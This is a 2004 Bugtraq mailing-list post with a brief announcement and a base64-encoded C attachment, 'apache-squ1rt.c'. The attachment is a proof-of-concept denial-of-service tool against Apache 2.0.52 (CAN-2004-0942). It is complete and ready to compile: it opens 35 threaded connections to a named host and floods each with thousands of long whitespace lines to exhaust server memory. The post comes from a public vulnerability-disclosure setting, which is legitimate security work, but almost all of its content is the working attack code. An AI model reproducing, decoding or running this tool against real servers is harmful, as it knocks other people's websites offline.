[37412] in bugtraq
Apache 2.0.52 DoS Exploit v2
daemon@ATHENA.MIT.EDU (Daniel Guido)
Fri Nov 19 05:03:13 2004
Message-ID: <9c22049304111723462a1a1d9b@mail.gmail.com>
Date: Thu, 18 Nov 2004 02:46:04 -0500
From: Daniel Guido <dguido@gmail.com>
Reply-To: Daniel Guido <dguido@gmail.com>
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_1388_575106.1100763964607"
------=_Part_1388_575106.1100763964607
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
A Linux implementation for the DoS in Apache 2.0.52 . See source code
for more details. Authored by Dan Guido and j0hny_lightning.
------=_Part_1388_575106.1100763964607
Content-Type: application/octet-stream; name="apache-squ1rt.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="apache-squ1rt.c"
LyoKQXBhY2hlIFNxdTFydCwgRGVuaWFsIG9mIFNlcnZpY2UgUHJvb2Ygb2YgQ29uY2VwdApUZXN0
ZWQgb24gQXBhY2hlIDIuMC41MgoKajBobnlsaWdodG5pbmdAZ21haWwuY29tCmRndWlkb0BnbWFp
bC5jb20KClNlbmRzIGEgcmVxdWVzdCB0aGF0IHN0YXJ0cyB3aXRoOgpHRVQgLyBIVFRQLzEuMFxu
CjgwMDAgc3BhY2VzIFxuCjgwMDAgc3BhY2VzIFxuCjgwMDAgc3BhY2VzIFxuCi4uLgo4MDAwIHRp
bWVzCgpBcGFjaGUgbmV2ZXIga2lsbHMgaXQuIFRha2VzIHVwIGh1Z2UgYW1vdW50cyBvZgpSQU0g
d2hpY2ggaW5jcmVhc2Ugd2l0aCBlYWNoIGNvbm5lY3Rpb24uCgpPcmlnaW5hbCBjcmVkaXQgZ29l
cyB0byBDaGludGFuIFRyaXZlZGkgb24gdGhlCkZ1bGxEaXNjbG9zdXJlIG1haWxpbmcgbGlzdDoK
aHR0cDovL3NlY2xpc3RzLm9yZy9saXN0cy9mdWxsZGlzY2xvc3VyZS8yMDA0L05vdi8wMDIyLmh0
bWwKCk1vcmUgaW5mbzoKaHR0cDovL3d3dy5jdmUubWl0cmUub3JnL2NnaS1iaW4vY3ZlbmFtZS5j
Z2k/bmFtZT1DQU4tMjAwNC0wOTQyCgpWZXJzaW9ucyBiZXR3ZWVuIDIuMC4zNSBhbmQgMi4wLjUy
IG1heSBiZSB2dWxuZXJhYmxlLApidXQgb25seSBkb3duIHRvIDIuMC41MCB3YXMgdGVzdGVkLgoK
VGhpcyBhdHRhY2sgbWF5IGJlIHByZXZlbnRhYmxlIHdpdGggYSBwcm9wZXJseSBjb25maWd1cmVk
CmlwdGFibGVzIHJ1bGVzZXQuIEdlbnRvbyBhbHJlYWR5IGhhcyBhIHBhdGNoIG91dCBpbiB0aGUK
Mi4wLjUyLXIxIHJlbGVhc2UgaW4gdGhlIGZpbGUgMDZfYWxsX2dlbnRvb19wcm90b2NvbC5wYXRj
aAoKdjIKUmV3cml0dGVuIHRvIHVzZSBwdGhyZWFkLgpnY2MgYXBhY2hlLXNxdTFydC5jIC1scHRo
cmVhZAoqLwoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8
c3RyaW5nLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVk
ZSA8bmV0ZGIuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5o
PgojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNsdWRl
IDxwdGhyZWFkLmg+CiNkZWZpbmUgREVTVF9QT1JUIDgwCgp2b2lkICpzcXVpcnRJdChjaGFyICpo
TmFtZSk7CgpjaGFyIGF0dGFja0J1Zls4MDAwXTsKY2hhciBsZXRzR2V0U3RhcnRlZFsxMjhdOwoK
aW50IG1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KXsKCWludCBudW1fY29ubmVjdDsKCWludCBy
ZXQ7CglwdGhyZWFkX3QgdGlkWzM1XTsKCglzcHJpbnRmKGxldHNHZXRTdGFydGVkLCAiR0VUIC8g
SFRUUC8xLjBcbiIpOwoJbWVtc2V0KGF0dGFja0J1ZiwgJyAnLCA4MDAwKTsKCWF0dGFja0J1Zls3
OTk4XT0nXG4nOwoJYXR0YWNrQnVmWzc5OTldPSdcMCc7CgoJaWYgKGFyZ2MgIT0gMil7CgkJZnBy
aW50ZihzdGRlcnIsICJVc2FnZTogJXMgPGhvc3QgbmFtZT4gXG4iLCBhcmd2WzBdKTsKCQlleGl0
KDEpOwoJfQoKCWZvcihudW1fY29ubmVjdCA9IDA7IG51bV9jb25uZWN0IDwgMzU7IG51bV9jb25u
ZWN0KyspewoJCXJldCA9IHB0aHJlYWRfY3JlYXRlKCZ0aWRbbnVtX2Nvbm5lY3RdLCBOVUxMLCAo
dm9pZCAqKXNxdWlydEl0LCBhcmd2WzFdKTsKCX0KCQoJLyogYXNzdW1pbmcgYW55IG9mIHRoZXNl
IHRocmVhZHMgYWN0dWFsbHkgdGVybWluYXRlLCB0aGlzIHdhaXRzIGZvciBhbGwgb2YgdGhlbSAq
LwoJZm9yKG51bV9jb25uZWN0ID0gMDsgbnVtX2Nvbm5lY3QgPCAzNTsgbnVtX2Nvbm5lY3QrKyl7
CgkJcHRocmVhZF9qb2luKHRpZFtudW1fY29ubmVjdF0sIE5VTEwpOwoJfQoKICByZXR1cm4gMDsK
fQoKdm9pZCAqc3F1aXJ0SXQoY2hhciAqaE5hbWUpeyAKCWludCBzb2NrLCBpOwoJc3RydWN0IGhv
c3RlbnQgKnRhcmdldDsKCXN0cnVjdCBzb2NrYWRkcl9pbiBhZGR5OwoKCWlmKCh0YXJnZXQgPSBn
ZXRob3N0YnluYW1lKGhOYW1lKSkgPT0gTlVMTCl7CgkJaGVycm9yKCJnZXRob3N0YnluYW1lKCki
KTsKCQlleGl0KDEpOwoJfQoKCWlmKChzb2NrID0gc29ja2V0KEFGX0lORVQsIFNPQ0tfU1RSRUFN
LCAwKSkgPCAwKXsKCQlwZXJyb3IoInNvY2tldCgpIik7CgkJZXhpdCgxKTsKCX0KCglhZGR5LnNp
bl9mYW1pbHkgPSBBRl9JTkVUOwoJYWRkeS5zaW5fcG9ydCA9IGh0b25zKERFU1RfUE9SVCk7Cgli
Y29weSh0YXJnZXQtPmhfYWRkciwgKGNoYXIgKikmYWRkeS5zaW5fYWRkciwgdGFyZ2V0LT5oX2xl
bmd0aCApOwoJbWVtc2V0KCYoYWRkeS5zaW5femVybyksICdcMCcsIDgpOwoKCWlmKChjb25uZWN0
KHNvY2ssIChzdHJ1Y3Qgc29ja2FkZHIqKSZhZGR5LCBzaXplb2YoYWRkeSkpKSA8IDApewoJCXBl
cnJvcigiY29ubmVjdCgpIik7CgkJZXhpdCgxKTsKCX0KCglzZW5kKHNvY2ssIGxldHNHZXRTdGFy
dGVkLCBzdHJsZW4obGV0c0dldFN0YXJ0ZWQpLCAwKTsKCglmb3IoaT0wOyBpIDwgODAwMDsgaSsr
KXsKCQlzZW5kKHNvY2ssIGF0dGFja0J1Ziwgc3RybGVuKGF0dGFja0J1ZiksIDApOwoJfQoKCWNs
b3NlKHNvY2spOwp9Cgo=
------=_Part_1388_575106.1100763964607--
